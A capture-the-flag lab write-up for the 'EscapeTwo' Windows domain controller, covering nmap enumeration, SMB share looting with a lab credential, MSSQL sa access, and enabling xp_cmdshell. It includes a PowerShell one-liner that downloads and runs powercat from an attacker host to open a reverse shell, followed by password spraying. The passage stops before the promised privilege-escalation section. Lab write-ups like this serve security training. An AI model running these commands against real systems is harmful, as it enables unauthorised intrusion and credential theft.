Week 1. EscapeTwo
SUMMARY
This a Windows Server 2019 running as domain controller. In a shared resource we find an XLSX file containing the MSSQL's sa account password in clear text. This allows to get an initial shell in the system. Once inside the system, we find a password in an MSSQL configuration file, that can be used to move laterally and collect the user flag.
Regarding escalation, we enumerate the AD with BloodHound CE and discover a permissive edge that allows a shadow credential attack and a lateral movement. Under the new context, we enumerate vulnerable AD CS templates and find one vulnerable to ESC4, which can be abused to dump the administrator's hash.
KEYWORDS
MSSQL, Impacket, mssqlclient.py, xp_cmdshell, owneredit.py, dacledit.py, shadow credentials attack, Certipy, Active Directory Certificate Services (AD CS), ESC4, ESC1.
ENUMERATION
Port scan.
> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
Nmap scan report for 10.10.11.51
Host is up, received user-set (0.058s latency).
Scanned at 2025-01-19 12:37:19 GMT for 101s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-01-19 12:38:39Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-18T18:40:12
| Not valid after: 2055-01-18T18:40:12
| MD5: 85f1791dca227d5a5c6f7600dad57dad
| SHA-1: 4724c7db5f1c2fdb9e4670a64895e728de85171e
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQHeU6tFZApItE1TBh0S85lTANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwMTE4MTg0MDEyWhgPMjA1NTAxMTgxODQwMTJaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALc6C9kY
| sFYn2KT6RED682MNEWGAihfdLMlBXHXBwfeGq+0Ekj2CQdX1t+MBgsWbcXyhFqut
| 2a+K9QAA3uLoYD/skIRVr13XdZMtGXz2q/Td2D0UD+UVmpUcG4KAu37LHyWc7z0W
| M0TeLGalIcvZCoz34b6V0cPQS3O6tGFPkqNa8V2VnuKEe6NtBk5uxi2uCdhnxEeN
| RM9NcflJ4ZKUPBukCxrxl7d440Ri9sZ2VaHfnR7BJq6ynqDuwM2FEWgHusf9s0dK
| OOmWz7PFVT1T2GgTf8FYoYHgWGGmM/YQCieY0GFeKTEJ53XGBpqwZHJ0BXgLbj3K
| ZWXapzr2eszCD40CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAqZNdKbRXoK0PZhf7
| x6DQgQBMRJwaHf8UqsOtGzQCNjboVJ7NlJkOsGaxoTOQAAFZX5BGJzxA+9EpKKoG
| 0paUvuEFPChIe45h2rfIwNeCpoIDnDn8zbKQvKDDwz5/f6v4+8mtdcygUXnt4iXX
| a6jPCXzHkPuND1V2QgCmr6gs1KpBCLX6fjyTMvzOA5fG1K/p6CMAF4bP2vvJ4NLA
| tKdJMtlj8XI32rYczM54VvTGGoyo7HnE4JZeZm3gx/OBcTZB8d6j3VMpoZFsZDeL
| XWqGAW3I0wjKl9gqzTBfc16SkyEcxTfGQ1kRGn6F7gwGn6G8+yQM9mbgjILt/G9e
| KbAmWQ==
|_-----END CERTIFICATE-----
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49685/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc syn-ack Microsoft Windows RPC
49689/tcp open msrpc syn-ack Microsoft Windows RPC
49694/tcp open msrpc syn-ack Microsoft Windows RPC
49716/tcp open msrpc syn-ack Microsoft Windows RPC
49739/tcp open msrpc syn-ack Microsoft Windows RPC
49809/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 1m16s, deviation: 0s, median: 1m16s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62012/tcp): CLEAN (Timeout)
| Check 2 (port 54223/tcp): CLEAN (Timeout)
| Check 3 (port 49465/udp): CLEAN (Timeout)
| Check 4 (port 20179/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-01-19T12:39:38
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 102.00 seconds
List of open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49685,49686,49689,49694,49716,49739,49809Looks like a domain controller. Domain name is sequel.htb and DC common name is dc01.sequel.htb
We have credentials rose:KxEPkKe6R8su so we will start with an RID bruteforce to get additional usernames.
> crackmapexec smb sequel.htb -u rose -p 'KxEPkKe6R8su' --rid-brute | cut -d \\ -f 2 | awk -F ' ' {'print $1}' | tr '[:upper:]' '[:lower:]'
Also enumerate SMB shares with provided credentials.
> smbmap -H sequel.htb -P 445 -u rose -p KxEPkKe6R8su
[+] IP: sequel.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
Accounting Department READ ONLY
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLYWe have access to several shares, let's begin with the "Users" folder.
> smbclient \\\\sequel.htb\\Users -U "rose%KxEPkKe6R8su"
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Jun 9 14:42:11 2024
.. DR 0 Sun Jun 9 14:42:11 2024
Default DHR 0 Sun Jun 9 12:17:29 2024
desktop.ini AHS 174 Sat Sep 15 08:16:48 2018
6367231 blocks of size 4096. 908717 blocks availableNothing useful here, move to the next share.
> smbclient "\\\\sequel.htb\\Accounting Department" -U "rose%KxEPkKe6R8su"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 11:52:21 2024
.. D 0 Sun Jun 9 11:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 11:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 11:52:07 2024
6367231 blocks of size 4096. 908717 blocks availableDownload the stuff, the file accounts.xlsx contains several passwords, including what seems to be credentials for MSSQL sa account.
USER
We have disclosed what seems to be MSSQL sa account password, let's try it with Impacket.
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/sa:'<password>'@10.10.11.51Once inside first step would be to enable xp_cmdshell
> enable xp_cmdshell
It seems it is correctly enabled, we can issue xp_cmdshell commands now. We will start by disabling character restrictions.
> SET QUOTED_IDENTIFIER OFFAnd now we can launch our favorite reverse shell.
> exec xp_cmdshell "powershell iex(new-object net.webclient).downloadstring('http://<ip address>/powercat.ps1');powercat -c <ip address> -p 1919 -e cmd"A reverse shell for user sql_svc is received on port 1919.
Since there is a database running, next step would be to enumerate the file system for configuration files. In this case we find clear text passwords in the path c:\sql2019\expressadv_enu\sql-configuration.ini
> type c:\sql2019\expressadv_enu\sql-configuration.ini
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD=
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD=
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=TrueSince we have a usernames list from our previous RID bruteforce, let's spray the password.
> crackmapexec smb sequel.htb -u userlist -p <password>
With the found credential we can have an Evil-WinRM session.
And collect the user flag.
SYSTEM
Start from the ryan shell and take the opportunity to enumerate the system.
> Get-ComputerInfo
